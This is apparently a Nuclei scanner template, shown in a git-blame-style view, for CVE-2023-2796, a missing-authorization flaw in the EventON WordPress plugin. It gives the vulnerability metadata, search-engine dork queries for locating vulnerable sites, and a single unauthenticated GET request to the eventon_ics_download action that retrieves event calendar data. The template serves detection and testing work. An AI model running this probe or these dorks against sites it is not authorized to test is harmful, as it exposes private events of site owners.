2023-07-11 12:32:11 +00:00
id : CVE-2023-2796
info :
2023-07-11 18:02:39 +00:00
name : EventON <= 2.1 - Missing Authorization
2023-07-11 12:32:11 +00:00
author : randomrobbie
severity : medium
description : |
The EventON WordPress plugin before 2.1.2 lacks authentication and authorization in its eventon_ics_download ajax action, allowing unauthenticated visitors to access private and password protected Events by guessing their numeric id.
2023-09-27 15:51:13 +00:00
impact : |
Unauthenticated users can perform privileged actions, potentially leading to unauthorized access or modification of events.
2023-09-06 11:43:37 +00:00
remediation : Fixed in version 2.1.2
2023-07-11 12:32:11 +00:00
reference :
- https://www.wordfence.com/threat-intel/vulnerabilities/id/dba3f3a6-3f55-4f4e-98e4-bb98d9c94bdd
- https://wpscan.com/vulnerability/e9ef793c-e5a3-4c55-beee-56b0909f7a0d
- https://nvd.nist.gov/vuln/detail/CVE-2023-2796
2023-08-31 11:46:18 +00:00
- http://packetstormsecurity.com/files/173984/WordPress-EventON-Calendar-4.4-Insecure-Direct-Object-Reference.html
2023-07-11 12:32:11 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score : 5.3
2023-07-15 16:29:17 +00:00
cve-id : CVE-2023-2796
cwe-id : CWE-862
2024-01-14 13:49:27 +00:00
epss-score : 0.05279
epss-percentile : 0.92282
2023-09-06 11:43:37 +00:00
cpe : cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:*
2023-07-11 12:32:11 +00:00
metadata :
2023-07-11 18:02:39 +00:00
verified : true
2023-09-06 11:43:37 +00:00
max-request : 1
vendor : myeventon
product : eventon
framework : wordpress
2023-07-11 18:02:39 +00:00
shodan-query : 'vuln:CVE-2023-2796'
2023-07-11 12:32:11 +00:00
fofa-query : "wp-content/plugins/eventon/"
google-query : inurl:"/wp-content/plugins/eventon/"
2024-01-14 09:21:50 +00:00
tags : cve2023,cve,wpscan,packetstorm,wordpress,wp-plugin,wp,eventon,bypass,myeventon
2023-07-11 12:32:11 +00:00
http :
- method : GET
path :
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_ics_download&event_id=1"
matchers-condition : and
matchers :
- type : word
part : body
words :
- "BEGIN:VCALENDAR"
- "END:VCALENDAR"
condition : and
- type : word
part : header
words :
- "text/Calendar"
- type : status
status :
- 200
2024-01-26 08:31:11 +00:00
# digest: 4a0a00473045022100a462fc483e81b3ddee78aa18d18ae92e4a7b930b20c131ac8879ca6039d05b120220675efd2ca04ea806a1992fb3ff9880d215a94c315a5ef678015f0f95815a4a4f:922c64590222798bb761d5b6d8e72950